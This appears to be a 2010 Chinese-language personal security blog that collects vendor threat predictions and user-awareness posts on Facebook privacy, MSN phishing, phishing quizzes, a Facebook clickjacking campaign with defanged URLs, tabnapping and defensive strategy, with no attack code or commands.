全球性疫情將逐漸絕跡，地區性或鎖定特定對象的攻擊將成長。
以下是2010年以及未來的一些主要預測

「錢」是一切的誘因，網路犯罪不可能消失。
Windows 7 將會帶來一些影響，因為，其預設的安全等級比 Vista 稍低。
就算使用非主流的瀏覽器或作業系統也無法避免風險。
惡意程式每幾個小時就會變形一次。
強制性感染已經成為常態，只要瀏覽到惡意網站就會感染。
未來將出現針對虛擬化與雲端運算環境的攻擊方式。
Bot 程式將永遠存在，無法根除。
企業網路/社交網路的資料外洩事件仍將持續發生。

資料來源：網路資訊雜誌 @2009/12/16

卡巴斯基實驗室發佈2010網路威脅預測報告：

來自檔案共享網路的攻擊增加
透過P2P網路，散播流行性的惡意程式將大規模的增加
來自網路罪犯的流量持續競爭
偽防毒軟體的詐欺程式衰退
針對Google Wave的攻擊
針對iPhone與Android移動裝置平台的攻擊將有所增加

「在2010年，特定的惡意軟體開發者將越漸成熟，並需要更大量的資源，以對抗防毒軟體公司。應用程式的弱點，仍會是網路罪犯的首要目標。而最終，我相信即時搜尋引擎、黑帽搜尋引擎最佳化技術（Black Hat Search Engine Optimization）與社交網路將會成為網路犯罪的重點。」
資料來源：卡巴斯基新聞 @2009/12/22

Panda實驗室：2010年度的電腦威脅預測

更多防毒廠商高舉雲端防護的旗幟-雲端運算的風暴即將來襲。
排山倒海襲來的惡意軟體-現行流通的惡意軟體數量將會持續成長。
社交陷阱-透過搜尋引擎（比方說搜尋引擎優化的欺騙手段）和社群網站上，以網頁強迫下載的方式來讓使用者受到感染。
Windows 7作業系統-Windows 7在未來兩年內勢必會掀起更多的惡意攻擊浪潮。
手機-如果幾年以後只剩下2～3家比較知名的手機平台，並且人們開始使用手機轉帳服務的話，到時我們再來談手機平台上的網路犯罪潛力也還不遲。
蘋果電腦-預計2010年將有更多設計專屬的惡意軟體去攻擊該平台的作業系統。
雲端運算服務-針對雲端基礎設備或服務的攻擊方式將越來越有可能實現。
網路戰爭-政治動機的網路攻擊，可能影響經濟或關鍵設施。

資料來源：Panda新聞 @2009/12/23

SophosLabs 安全威脅報告：2010年
(此報告乃回顧2009)

Social networking：社群網路勢不可檔，做好衝擊因應。
Data loss and encryption：第一步如何在資料遺失前對其進行加密，第二步如何控制使用者處理資料。
Web threats：Web仍是惡意程式最大散播媒介，而偽防毒軟件與SEO惡意軟件興風作浪。
Email threats：惡意郵件不死，透過郵件附件與嵌入連結方式散播從未停歇。
Spam：受控制的殭屍電腦仍是最大發信來源。IM及社群網路散播居次。論壇與部落格的留言要注意。
Malware trends：有著巨大的地下經濟利益。Adobe Reader(PDF)成為攻擊目標。知名蠕蟲-Conficker。
Windows 7：提供一個更加安全的環境，但仍有改善的地方。
Apple Macs：調查有69%的 Mac 使用者並未安裝防毒軟體。但跨平台的 PDF 漏洞卻充斥著。
Mobile devices：智慧型手機帶來惡意程式的隱憂。
Cybercrime：經過十年已經發展成巨大的地下經濟體，而個資與信用卡資料是黑市熱買商品。
Cyberwar and cyberterror：民生重大基礎建設(如水力、電力...等)可能透過網路遭受遠端攻擊、控制或破壞等。此亦為未來一大隱憂。

資料來源：SophosLabs @2010/1/xx

Cellopoint對2010年郵件威脅預測：

僵屍網路與惡意程式持續增加
社交網路安全威脅急遽攀升
第三方遊戲與應用程式威脅猶如不定時炸彈
短網址服務成為駭客的最愛工具
中文及東亞語系垃圾郵件量比例升高
雲端運算的安全議題

資料來源：Cellopoint 新聞 @2010/1/4

Websense安全實驗室提出2010年八大威脅預警：

隨Web 2.0而衍生的攻擊將更趨成熟而普及。
殭屍病毒橫行且相互搶占地盤、火藥味濃厚。
“假借熟識者的偽Email”因攻擊成功率高，再度成為駭客使用媒介首選。
針對微軟為目標的攻擊事件，目前預測鎖定Windows 7和IE 8。
小心點選搜尋結果。
駭客也花錢下廣告?!假廣告隱藏真危機，網友要小心！。
Mac作業系統能夠一如既往面對威脅卻全身而退嗎？2010年會證明，「不可能！」。

資料來源：Websense安全實驗室新聞資料室 @2010/1/11

賽門鐵克資安儲存趨勢2009年回顧暨2010年觀察
2010年值得觀察的網路安全趨勢：

防毒已經不夠了
社交工程 (Social Engineering) 將成為主要的攻擊媒介
流氓安全軟體廠商將變本加厲
社群網路第三方應用程式將成為詐欺的目標
Windows 7將成為攻擊者鎖定的對象
即融殭屍網路(Fast Flux Botnets)將增加
網址縮短服務將成為網路釣魚者的幫兇
Mac 和手機惡意軟體將會增加
垃圾郵件作者不再墨守陳規
隨著垃圾郵件作者對環境的適應度，垃圾郵件的數量將持續波動起伏
專業化的惡意軟體
CAPTCHA技術將有所改進
即時通訊垃圾郵件
非英文的垃圾郵件數量將持續增加

2010年值得觀察的儲存趨勢：

2010是「刪除年」
2010是終止累積備分磁帶作長期保留之用的一年
無所不在的重複資料刪除
產業競爭將推動標準化軟體的發展
移轉的一年
虛擬化的腳步將超越x86的範圍
雲端儲存迎頭趕上
雲端儲存推動資料管理
企業組織已經無法拖延「綠色」運動

資料來源：賽門鐵克新聞 @2010/2/25

CSA (Cloud Security Alliance):Top Threats to Cloud Computing V1.0

Abuse and Nefarious Use of Cloud Computing(濫用或非法使用雲端運算)
Insecure Interface and APIs(不安全的介面與 API)
Malicious Insiders(惡意的內部人員)
Shared Technology Issues(共享技術產生的議題)
Data Loss or Leakage(資料遺失或外洩)
Account or Service Hijacking(帳號或服務劫持)
Unknown Risk Profile(未知的風險):使用者無法了解雲端所使用的網路架構、系統架構、軟體版本等重要資訊，亦無法進行安全評估。

資料來源：Top Threats to Cloud Computing @2010/3/xx

安天(ANTIY)實驗室信息安全威脅綜合報告
信息安全威脅\趨勢預測：

隨著0Day漏洞的增加，網站掛馬依然是黑客入侵的主要方式，可以預見2010年下半年網站掛馬的數量將會大量增加。
第三方軟件漏洞將成為黑客利用的主要途徑，近年來頻頻發生的第三方軟件安全漏洞多為黑客所利用，也造成了巨大的影響，
無線攻擊將會成為黑客攻擊的新目標，目前已經出現的無線破解技術，可以讓攻擊者免費蹭網。今後無線攻擊將會給用戶帶來更大的威脅。
病毒將越來越頑固，2010年上半年出現了大量的惡意IE圖標病毒，因其為註冊鍵值，所以傳統的殺毒軟件將病毒清除後並不能刪除惡意的IE圖標。
修改主引導記錄的病毒將增多，病毒利用此技術可以先加載病毒文件再啟動操作系統，使反病毒軟件難以查殺。

反病毒技術發展趨勢分析：

反病毒廠商將根據計算機病毒整體的變化來修改雲計算的算法，用以更快的發現小範圍內傳播的計算機病毒，使雲計算更加合理。
反病毒產品將加強自身及用戶系統的保護，防止主引導記錄被修改等，以弱化惡意代碼取得系統控制權的能力。
反病毒產品將提升綜合處理能力，盡量全面的清除病毒並將系統恢復到正常工作狀態。

資料來源：安天實驗室病毒预警 @2010/7/6

IBM X-Force 2010 年中趨勢與風險報告：

攻擊者逐漸使用諸如 Javascript Obfuscation 與其他的轉換技術，這讓 IT 安全專業人員備感頭痛。Obfuscation 是一種供軟體開發人員與攻擊者之類用來隱藏或遮蔽所開發應用程式碼的技術。
向來不勝枚舉的安全漏洞舉報增加了 36%。在 2010 年，我們看到大量的安全漏洞揭露，這是因為公開漏洞利用發佈數目大量增加，以及多家大型軟體公司致力於識別及降低安全漏洞。
PDF 攻擊持續增加，因為攻擊者找到新方法詐騙使用者。要瞭解 PDF 為何成為攻擊目標，您可以思考一下，在企業組織中端點通常是最弱的鏈結，而攻擊者當然知道這個事實。例如，在特定端點上可能沒有機密資料，但該端點可能會存取具有機密資料的端點，或者，該端點可以作為特定的彈跳點，以啟動對其他電腦的攻擊。
Zeus BotNet 工具箱持續嚴重摧殘組織，Zeus BotNet 套件在 2010 年初發行更新版 Zeus 2.0，此版本中的主要新功能為攻擊者提供更新功能

資料來源：IBM X-Force 威脅報告 @2010/8/xx

最後，一些心得與想法：

地下經濟(Botnet、黑市交易...)已然成型，正視它吧。
有意圖(政治、經濟、商業、機密資料...等目的)的攻擊行動，這才是比較棘手的。
新技術(新作業系統、智慧型手機、雲端...等)的出現，永遠都是新戰場，黑白兩道都想插旗子。
電子郵件與 Web 一直都是惡意程式散播的超強媒介，但目前都看到電子郵件與 Web 有開始轉型的跡象。(fb 可能推出的新世代電子郵件，Web 有另類 APP 或雲端的轉型概念)
熟悉使用各瀏覽器特性，培養建全資安意識，點滴打造安全瀏覽環境，將是網路使用者持續努力的長久課題。
企業對於機敏資料的保護，同樣是持續努力的長久課題。
漏洞永遠存在，如何在惡意利用前找到或發現，如何在惡意利用當下阻擋或發掘，如何在惡意利用後察覺、反應、應變，沒有解決方案，只有「面對它、接受它、處理它、放下它」。
社群網路將使攻擊手法更貼切、平易近人，形成特定、細膩化的攻擊。若使用者無法在社群網路上控管好個人隱私，哪又如何寄望使用者能對企業機敏資料善盡保管之責呢？

《社群網戰》(The Social Network)：朋友背叛與背叛朋友

2010-11-05T20:00:00.006+08:00

此篇暨
「你！出賣朋友嗎？」
「誰在看我的噗 (About Micro-Blogging)？」
「帳號密碼妙關聯，一般會員知多少」
「請務必尊重與注意隱私問題！！」
「Please Rob Me!! XD ~~」
相關社群網站系列之延伸。這篇應該是完結篇了吧！！

看完相關文章後，在連結到上圖，不知「你」有何想法？
沒有～～ＸＤ
再看一篇新聞：「Facebook承認應用開發者販賣使用者資料」。
還沒有想法嗎？

請注意圖片中此兩段內容：
「允許此程式取得包括姓名、大頭貼照片、性別、所屬網絡、用戶 ID、朋友名單等基本資料，以及其他我同意和所有人分享的內容。」

「一旦點擊「同意」，你將開啓開放平台應用程式功能，你的「經由朋友存取你的資料」的隱私設定將會被重設為預設值。」
=====
又有多少人了解上述兩段話的內容呢？這兩段話術哪個比較嚴重呢？

乍看之下，似乎前段比較嚴重。但事實是第二段話比第一段嚴重十倍以上。幾乎所有人都閉著眼睛點擊吧。

PS: 第二段話會出現是「你已經關閉了所有Facebook平台的應用程式、遊戲和網站。」，在關閉此功能狀況下才會出現的；若無出現此段話，表示你已經允許應用程式(APP)，讀取你的資料，至於是哪些資料，可以參考下圖中有勾選項目的資料。

來看看「隱私設定將會被重設為預設值」這句話是何意義？別跟我說意義是三小...XD，如下圖：

這張圖看完，「你」知道代表甚麼意義嗎？

這是隱私設定的預設值，它代表應用程式(APP)可以透過「你的朋友」，去讀取「你」的相關隱私資料。也就是說，「你的朋友」點擊「同意」，「你」的資料也跟著被搜集。如果是「你」點擊「同意」，哪應用程式(APP)就會一併去蒐集「你的朋友」資料。有哪些資料？就在圖片中的選項。換句話說，在點擊第一張圖的「同意」時，表示應用程式(APP)可以讀取「你」的個人資料外，連帶開放個人資料讀取的預設值，除了蒐集「你」的資料，也蒐集「你的朋友」的資料。

你一定得要知道這功能設定的意義，這設定畫面變來變去的...XD，其中「可以透過你的朋友取得的資料」這內容你要特別去了解，透過「社交」權限讀取你的資料，該說蒜你很，還是薑你軍咧。我只想說陰險。當初開放這些資料，「你」應該直覺是「僅僅」給「你的朋友」查看吧！

另外，是不是該縮限應用程式(APP)能讀取資料的範圍呢？即便全部不勾選，還有「（以及其他你對「所有人」開放的資料）」這句話喔！我想應該是說，不給應用程式(APP)讀取資料的話只有「關閉所有Facebook平台的應用程式、遊戲和網站」一途。否則，應用程式(APP)還是能透過「你」公開的資料進行讀取，甩都甩不掉。也就是說一旦你使用的某個「應用程式、遊戲和網站」，它能取得「你」的資料外，還有「你的朋友」的資料。

這時想起偷菜的回憶了嗎？

[思考]在社群網路沒出現以前，也就是所謂 Web1.0 的時代，這些想取得個人資料的人，要如何做？
建立一個網站，吸收會員，會員登錄資料，取得個人資料。
或者，舉辦一個網站活動，以「贈獎」為名，吸引網友登錄個人資料，來取得相關資訊。
... ...想想，多麼緩不濟急呀。 Web2.0 時代，輕鬆透過一個 APP，在加上社群的推介、宣傳，點擊之間瞬間秒殺「一群人」。

你了解隱私權設定嗎？你又在乎你的朋友隱私資料嗎？朋友又在乎你的隱私資料嗎？下圖，它將不斷的考驗「你」及「你的朋友」：

彈指之間，個人資料飄入雲端，想取回，可難了。

老梗!!但就是能唬人!!(MSN Phishing)

2010-09-11T16:39:00.004+08:00

看完這兩張圖，有啥感想呢？簡單的方式也能把帳密搞到手。
老梗!!但就是能唬人!!

再看看先前的文章：
騙取MSN帳密的釣魚網站...真多!!

再來看看 MSN 上面的網址：
www.checkchat.info
比較瀏覽器的 URL 網址：
chatreminder.com
你的警覺性呢？

比較好玩的是，這網站還有「常見問題」，來鬆懈瀏覽者的心防...XD
==摘錄一下==
是否安全？
當然可以。 chatreminder.com不保存您的郵件地址，您的密碼或聯繫人名單。您輸入的數據只是用於檢索所請求的信息，並立即丟棄。如果你還是覺得不安全臨時更改您的密碼才能使用此工具。

chatreminder.com 與 MSN Messenger®有關嗎?
chatreminder.com是不涉及任何方式與 MSN Messenger ®有關。

請問這個在線刪除檢查工具是怎樣工作的?
這個工具登錄到MSN Messenger ®的服務器，任何IM客戶一樣。
下面的MSN Messenger ®通信協議，它使用用戶驗證帳戶和密碼，他或她的檢索聯繫人名單，分析它，顯示在聯繫人中刪除用戶從聯繫人名單。

這個檢查工具可以告訴我我已經被阻止了嗎?
不，我們將會儘快實現這個功能。

chatreminder.com是在釣魚（Phising）嗎?
絕對不是。這將是非法的。 chatreminder.com不會以任何方式儲存或登錄您的帳戶或密碼。

chatreminder.com是病毒嗎?
不是，它不會安裝任何東西在你的機器，也不會危害您的IM客戶端。

使用聯繫人檢查工具之後，我無法登陸MSN客戶端.
沒有技術層面上的原因。使用聯繫人刪除檢查器，也能暫時從另一台計算機暫時登錄到您的MSN帳戶。

聯繫人刪除檢查器是使用了Messenger® 的漏洞或後門來工作的嗎?
絕對不是。它只是登錄到MSN Messenger ®的服務器，任何IM客戶一樣。下面的MSN Messenger ®通信協議，它使用用戶驗證帳戶和密碼，他或她的檢索聯繫人名單，分析它，顯示在聯繫人中刪除用戶從聯繫人名單。

chatreminder.com是蠕蟲嗎?
定義：一種計算機蠕蟲病毒是一種自我複製的計算機程序。它使用一個網絡發送自己的副本到其他節點（計算機終端在網絡上），它可以這樣做沒有任何用戶干預。不同於病毒，它並不需要依附在現有的程式。網絡蠕蟲總是傷害（如果僅通過消耗帶寬），而病毒感染或損壞的文件總是在目標計算機上。
chatreminder.com不會發送自己的副本，沒有用戶的允許，它是不會工作的，它不會損害任何網絡或計算機。 chatreminder.com不是一種蠕蟲病毒。

為什麼我需要輸入我的帳戶和密碼?
聯繫人刪除檢查器需要登錄到MSN Messenger ®的服務器上，以自己的名義來檢索您的聯繫人名單。

使用工具后，我需要更改自己的密碼嗎?
沒有必要，因為在任何情況下chatreminder.com並不存儲密碼，但如果要安全些，請使用臨時密碼使用本工具。

chatreminder.com會改變任何關於我的MSN Messenger ®帳戶的信息嗎？
通過使用聯繫人刪除檢查器時 chatreminder.com暫時改變你的暱稱為“http://www.chatreminder.com：查找是誰把你從他/她的聯繫人名單”只作廣告用途。您可以更改尼克再次下一次您登錄到您的MSN Messenger ®客戶端常規。

chatreminder.com會發送即時消息給我在線聯繫人嗎？ ?
通過使用聯繫人刪除檢查器時 chatreminder.com傳送即時訊息代表您接觸到您的在線廣告的網站。

因此，如果您不竊取帳戶，密碼或者損害 IM客戶或者計算機，你靠什麽盈利？
這很簡單。我們只是試圖通過更多的訪問量來賺取廣告費，除此之外，沒有任何見不得人的或者惡意的事情。
=====

... . ... ... .......

模擬實戰釣魚網站(Challenge to Phishing-II) Part-II

2010-09-11T10:07:00.016+08:00

<截圖自https://www.phish-no-phish.com/網站>
有個網站：
https://www.phish-no-phish.com/
上面有五題考題(同樣題目五題，但有兩種不同問法，所以是十題)，測驗你對釣魚網站的識別能力。我覺得挺好的。
身為網路的一份子，你一定得要試試。這裡有中文的...cool
https://www.phish-no-phish.com/tw/default.aspx

這是 VeriSign 提供的一個測試網站。
我把心得寫在後面，建議大家測試完畢再看心得分析。
您有心得，也可以留下意見喔！

一、威脅、利誘，甚至是恐嚇的字眼。
這類字眼確實很常出現，因為，效果真的很好，也很常出現在詐騙的電子郵件中，可以参考這篇。在大部分騙取帳密的手法中，這是很常出現的字眼，目的當然是要你乖乖把帳密交出來。

二、網址列(URL)中搞把戲。
這裡還有一些手法，不過，當瀏覽器吃進這些怪 URL 後，應該都會解碼回來，超連結是比較常利用這手法的。另外一種花樣就是利用相似字元，如 1-l, 0-O, V-U, ...等，還有很多字元，甚至不同字型間也會有意想不到的效果，你有警覺嗎？想想，你連線的網站，確切是你要連往的嗎？
我想，URL 搞怪方事還很多，如何識別，我想窮舉不完。但是，你只要知道一種就好，啥是正常的...XD，學校沒講、老師沒教。下面這些 wiki 你一定得看：
http://zh.wikipedia.org/zh-tw/URL
http://zh.wikipedia.org/zh-tw/域名
同鞋，網路上都有，不能怪老師、學校啦。

三、這題很難，語意不順、文字不對。
這真得是挑錯字。只能說正式官網應該會經多重查核，才會進行上線，因此，"比較"不會出錯。但是，詐騙網站經常會出現語意不順或用詞錯誤，甚至是語系的問題。

四、網站加密圖示。
這題應該比較簡單，因為，"宣傳"夠多。你必須能正確識別「你的網頁瀏覽是否正處於加密的狀態」。每個瀏覽器還都會有些不同，甚至不同版本間還有些小差異。你務必花點時間了解。畢竟，該加密時，網站與瀏覽器之間就該處於加密的狀態。
另外一個進階問題：你會正確識別正確的加密簽章嗎？如果釣魚網站隨便用個簽章做加密呢？課後題。

五、這題也很難，關建在 URL 中，即便知道哪有問題，但又該如何判斷。
首先，多一個「-」符號，在數位世界它就是不一樣，且是完全不一樣。判斷得靠直覺，那個判斷點很重要。留給你仔細思考。
「提示：如果你是銀行單位你會申請哪一個網域」

最後，釣魚網站可以做到與真實網站一模一樣嗎？這通常還需要搭配其它攻擊手法，如網址嫁接(Pharming)，正因這類手法配合條件不易，這也是為何釣魚網站必須一直在 URL 處動手腳的原因。
網址嫁接攻擊有很多種手法，如DNS快取汙染(DNS cache poisoning)手法是一種。另外本機的 Hosts 檔案竄改也是其一手法。當然，還有其他的...XD。

本文亦張貼於「阿碼外傳」。

Facebook 出現點閱綁架(Clickjacking)之攻擊手法分析

2010-06-03T14:23:00.006+08:00

參考新聞：
ZDNet Taiwan: Facebook出現惡意連結讓你說讚
ITHome: Sophos：點閱綁架侵襲Facebook
資安之眼：玩臉書喊「讚」小心陷阱
Graham Cluley’s blog: Viral clickjacking 'Like' worm hits Facebook users

YouTube: hundreds of thousands of people over this hoilday weekend were infected by a clickjacking worm

來看看整個攻擊手法：
1.架設「釣魚網站」，內含點閱綁架(Clickjacking)手法，有很多個：
hxxp://disneyhiddenlike. blogspot.com/
hxxp://manpictureofhimselflike. blogspot.com/
hxxp://2006mindfreaklike. blogspot.com
hxxp://2006mindfreaklike2. blogspot.com
hxxp://girlownedbypolicelike. blogspot.com/
hxxp://girlownedbypolicelike2. blogspot.com/
hxxp://disneyhiddenlike. blogspot.com/
hxxp://disneyhiddenlike2. blogspot.com/
hxxp://thedatesafe. com/obama/
hxxp://www.thedatesafe. com/man
hxxp://www.thedatesafe. com/promdress/

還有很多的，不過畫面大致如下：

2.開始散播「Liked」(「讚」)的留言，並對應到相對之「釣魚網站」：
“The Hidden Body Part The Artists at Disney Didnt Want You To See.” -> http://disneyhiddenlike. blogspot.com/

“LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE.” -> http://girlownedbypolicelike. blogspot.com/

“This man took a picture of his face every day for 8 years!!” -> http://manpictureofhimselflike. blogspot.com/

“You’ll NEVER believe what OBAMA did on TV” -> http://thedatesafe. com/obama/

“The Prom Dress That Got This Girl Suspended From School.” -> http://www.thedatesafe. com/promdress/

3.FB 用戶點擊了這些留言，被誘騙到「釣魚網站」，若再點擊了「Click here to continue」之連結，就會在自己 FB 的「塗鴉牆」上留下「新的詐騙留言」，使其他人上當。如此周而復始。

馬後炮：
1.點閱綁架(Clickjacking)手法並不是出現在 Facebooks 網站上。
這意味著 FB 上的超連結還是可以信賴的，是連結的內容不可信賴。在看各新聞時，我以為 FB 網站受到攻擊的，但事實上並不是如此。

2.關鍵在於 FB 上的超連結，會誘騙使用者到「釣魚網站」，該網站中夾帶點閱綁架(Clickjacking)的攻擊手法。所以，最大的問題在這裡，您的警覺性呢？
「模擬實戰點閱綁架手法(Challenge to Clickjacking)」你注意到了嗎？
不同的劇本利用，您就無法脫身嗎？

3.目前觀察只有在您的 FB 上做留言，使你的「好友」也受騙上當。
透過「釣魚網站」不斷的點擊留言，使更多人受騙上當，達到散播的目的。可以加以利用其他手法的，如最常見的「偷 cookie」、「網頁掛馬(Drive by Download)」、「XSS Worm」、「Click by Download」...等，其實玩的花樣還很多。我不是教你使詐...XD。

==2010/06/07 Update==
手法有些變化了，「Facebook “likejacking” targets World Cup, BP, Shrek, UFC, …」，SophosLabs blog 裡面提到，該「釣魚網站」出現好幾種不同的網頁內容了，不再是「Click here to continue」連結的單調內容，「劇本」有變化，您的警覺性呢？
====

4.Sophos 稱這個手法叫做「Likejacking」。
XD...如果利用撲浪或推特來散播留言，是不是手法又要改名了。

模擬實戰標籤綁架手法(Challenge to TabNapping)

2010-05-27T14:54:00.016+08:00

暨「點閱綁架(Clickjacking)」手法之後，又出現「標籤綁架(TabNapping)」的新手法了。
直接來親身體驗吧！這裡有實作的體驗網站（FireFox 確定可以被利用）。畫面如下：

實戰標籤綁架，主要利用欺瞞手法，當你瀏覽網站時，切換到不同索引標籤(或書籤、分頁)，或切換到不同視窗後五秒鐘，該有問題的頁面就會被偷偷轉換成另外一個誘騙的瀏覽頁面，於是就出現「猥琐」的事件。目前已知可以成功的瀏覽器：
1.Firefox 3.6.3
2.Chrome 4.1.249.1064

手法剖析：
1.目前大多主流之瀏覽器都有索引標籤(IE & Safari 使用此稱呼)、標籤頁(Safari 亦有用此稱呼)，或稱「分頁」(Chrome & FireFox 使用此稱呼)功能。
2.當大量使用上述功能於同一瀏覽器中，其中一頁面可以用此程式語法加以利用。
3.將頁面內容偷偷改變成為另一頁面內容，導致誘騙上當之情事。
4.可做為網路釣魚或詐騙的手法之一。

相關挑戰之系列文章：
「模擬實戰點閱綁架手法」
「模擬實戰釣魚網站」(目前已被歸類為 Click by Download 手法)

參考資料：
Raskin 之個人部落格 PS:他是 Mozilla Firefox 瀏覽器的介面及創意負責人。在他的 Bolg 上亦展示了此手法。
相關新聞：
ITHome
資安之眼

本文同步張貼於「阿碼外傳」。

攻擊與防禦思維 II

2010-05-20T09:00:00.005+08:00

有鑑於前一篇「攻擊與防禦思維」太過於消極，所以這邊平反一下，還是要正面思考...(丟筆...

一、「攻擊者積極，防守者消極」
1.防守士氣：這點是非常重要的。主官如何激勵士氣，為首要要務。如果沒有士氣，砸再多資安防護設備也是枉然。士氣有多重要，可以看看這個新聞，不過一般常見士氣不彰的結果，是會造成人員異動頻繁的。話說回來，不只是資安單位，整個公司的氛圍更重要，這不是多高薪水能禰補的，唯一不受影響的只有肥貓。且一旦士氣萎靡，要提升可不是短時間就可以達成的，務必多加留意。
2.內部該「一致」對駭客：很多狀況是，明明野生動物在門口拉的一坨屎，兩鄰居卻大打出手，終身不相往來。如何避免這種狀況，考驗主管們的 EQ 了。很多問題其是沒有對錯的。
3.資安未必是專責，資安至少要成為共同語言：這一點其實我也有點矛盾，到底是應該資安專責專才呢？還是要全民皆兵呢？我想了很久；應該要配合公司體質吧！我深深的覺得有時候「資安觀念就跟衛生觀念一樣，你的社區有個衛生習慣很差的人，往往整個社區烏煙瘴氣」。電腦技能目前已經成為職場必要技能了，我想資安觀念也該成為基本技能之一了。
4.培養 IT 人員的資安專才：這是持續長久的工作，也是計畫。甚至培養 IT 人員的資安第二專長，逐漸建立企業內部的資安專業人才。
5.建立資安人脈：有了技術，就該用技術出去交流了。企業的上下游、資安供應商...等，都該保持良好關係的。也可參考「我不是教你使詐」一文。

二、「木桶理論」
1.建議重新檢視網路架構開始：只要網路架構有問題，結果應該跟 IT 團隊士氣潰散差不多，甚至更糟，它可是所有架構的根基啊。
2.在端點安全無法求的安全前，全面切割內部使用者，接觸核心系統的可能；反之，如果無法與核心系統切割，哪，使用者就必須與外部切割。舉個簡單的例子，你有看過銀行行員處理金融業務的電腦可以上網嗎？可以收 E-Mail 嗎？現實問題大多是使用者過於寬鬆的電腦使用權限，IT 部門收不回來。
3.參考「資訊安全-管理、制度」系列一文。
4.ISMS 已經提很多了，積極管理、有效落實吧。

三、「風險的變遷」
1.了解自己的系統架構：這是基本的，如果對於自己使用了哪些系統平台或架構不清楚，哪...「風險 = 資產價值 + 安全威脅 + 安全弱點」該如何評估呢？很明顯，風險變化跟資產、威脅、弱點都有極大關係的，而這裡面的每一點都跟你擁有的系統有關聯。
2.資安盟友：有時資安圈都有一手的小道消息，這時你就知道「意義是三小，我只知道義氣」道理了。
3.自我研習：嗯嗯啊啊！這點大家的問題應該都是「有空再說」。這點需要有誘因的，獎勵措施往往都是最有效的方法，否則，只能單靠個人的熱血或熱情支撐吧，難道，資安工作也靠個人的熱血或熱情支撐？
4.資訊吸收與分析：訂閱資安技術消息、資安通告、駭客技術發佈...等 RSS 文章。情蒐是很重要的，主要問題在於要消化卻是不容易的。

四、「商業邏輯問題」
1.對於「B to C」及「C to C」的業者，建議應該有「防詐騙官」的角色，來協助解決各種防詐騙的技倆，並加以防治。
2.「為何有人會造成這問題」：主要還是「當初設計時沒有想到」的問題。換句話說，在架構或機制設計時，只有考慮功能面，沒有資安或防詐騙的觀念融入。
3.「誰會利用這問題」：透過「防詐騙官」的角色，可以找出已經被利用的問題，並設法加以解決，企業衍生的社會問題，得要拿出企業社會責任。
4.其他比較一般性的問題，「滲透測試」大多可以發現，前提是「好的」滲透測試。
5.我比較贊成類似「Yahoo!奇摩 Open Hack Day」的方式，也許可以僅限公司內部、或企業對企業、或企業上下游...等方式來舉辦，同時還可以提升 IT 團隊的工作士氣，也能促進跨企業 IT 人員之間的互動。這點也是我寫「滲透測試之全民公測」的起因之一。要相信一點，人人都有功夫，網路上人人都是 Hacker，這真的無關太多技術，即使「誤用(Misuse)」也一種 Hacking。

五、「未知弱點」
這點跟「風險的變遷」有頗大的關聯。
1.對於目前使用的系統，接收相關漏洞揭漏的資訊來源。
2.思考如何掌握「未知」變成「已知」的關鍵時刻：這點是許多人不敢想的，說穿了，要不就沒人發現，不然，只能比駭客還早發現，但，你有哪些作為來掌握此關鍵時刻呢？滲透測試？你一定得要想些不用成本的，或好幾種措施才行。
3.資安或 IT 圈子之間的互通有無。
4.是不是也該有點內部的舉報獎勵措施呢？花錢請人找漏洞，怎不給自己人一點機會...XD。舉辦類似「Hacking Day」的活動也不錯。
5.對使用的技術、系統、架構、平台...等，持續保持研究的態度。如果 IT 是你的核心業務支助的話，絕對不能只會開車，而不會修車...這樣是不夠的；況且，很多企業是請一個人來開車、另一個來修車的，因為你很難確實掌握車況，結果卻是一天到晚「顧馬路」。

六、「資安打手」
no comment...

七、「有發生啥事嗎」
唯有正面面對一途。

最後，提一點，企業對資安的設備(或技術)、人才、管理上，三方面的投資比重是多少？比例該多少才合理呢？我不知道，也沒有答案。我也希望有人提供資料給我參考哩！但我想，如果花在資安的設備(或技術)達八九成以上，是不合理的。

攻擊與防禦思維

2010-04-18T16:05:00.007+08:00

看完 Roamer 大大的「駭客想得和你不一樣！」一文，有頗深的感觸。

「為什麼這麼多單位通過了資安認證後，卻還是被黑得很慘。」
首先「通過資安認證」跟「被黑得很慘」沒有太大關係，沒有通過驗證的單位也有沒被黑過的。怎解釋呢？我想得從資安認證的目地說起了。絕大部分資安認證的目的是為了「絕對安全」嗎？是真的為了把「資安做好」嗎？但是，通過認證後卻都異口同聲的說：我們的資安防護很安全。

突然想起馬雲的一句話：「西方人的智慧，是看見別人看不見的東西；東方人的智慧，是看見當作沒看見。」

這邊大概整理一下 Roamer 大大的：

一、「攻擊者積極，防守者消極」
這點是極重要的一環，也是非常貼近現實的。在「我不是教你使詐」一文中就提及了，每年攻方都有大補丸，較於防守方或 IT 人員默默不聞或遮耳閉眼，兩相比拼，一漲一消，高下立判。
況且，消極攻擊者只要學會一、兩招，就能吃遍天下了，掛馬的還是玩掛馬、DDoS的還是慣用DDoS、偷資料的還是默默協助異地備援、惡意郵件攻擊的仍舊發著釣魚郵件、竄改網頁的仍舊樂此不彼地爭奪排名。
對於防守者來說，就得承受玲瑯滿目、五花八門的招數，充斥了各種威脅與損失。
消極的攻擊，就要積極的防守。攻擊者若積極，哪防守的該如何呢？

二、「木桶理論」
這是個很爛的理論，坦白說我不太喜歡，且它會讓人有誤解。或許「木桶比喻」、「木桶概念」比較恰當。因為用「理論」是必須很嚴謹的，木桶的容器根本是不可能把水保護好的，水還會蒸發掉，木片有毛細孔，即便木板密封，水還是會不見，當把水放到木桶中保護，根本就是個錯誤，也讓許多人對其有誤解。做資安第一件事就是要慎選容器，否則，疊床架屋的結果會很慘，再多的緩和、補救、強化、防禦措施都沒有用的。聽說，現在很多人還希望大家把水放到雲端裡，當然不是不行，但是不是所有的水都要放到雲端呢？慎思。

三、「風險的變遷」
這跟第一點是大致相同的，正因為不積極，當然也就更不會注意風險的變化，還有的甚至存在防火牆無敵論、入侵防護神化論，直到被打到痛處。
外在風險變化，通常也是防禦調整重點，如何掌握花三分力氣，得到七分功效，在於你的敏感與即時防禦調整。
另外，區分不同輕重緩急等級的安全區域也是很重要的一個防禦觀念。把七分的力氣花在重點區域上，來求得九分九的安全性，這是快速有效率的一個方式。上軌道後再慢慢增強防護力道。
重點防禦絕對不是資安速成，否則，一不小心留下其他路或通道，哪，後果不堪設想。

四、「商業邏輯問題」
這類問題主要是「人」疏忽造成的問題，也得靠「人」來發現問題。所以主要的問題就是「為何有人會造成這問題」、「誰會利用這問題」，從這兩方面著手通常可以獲得解決。
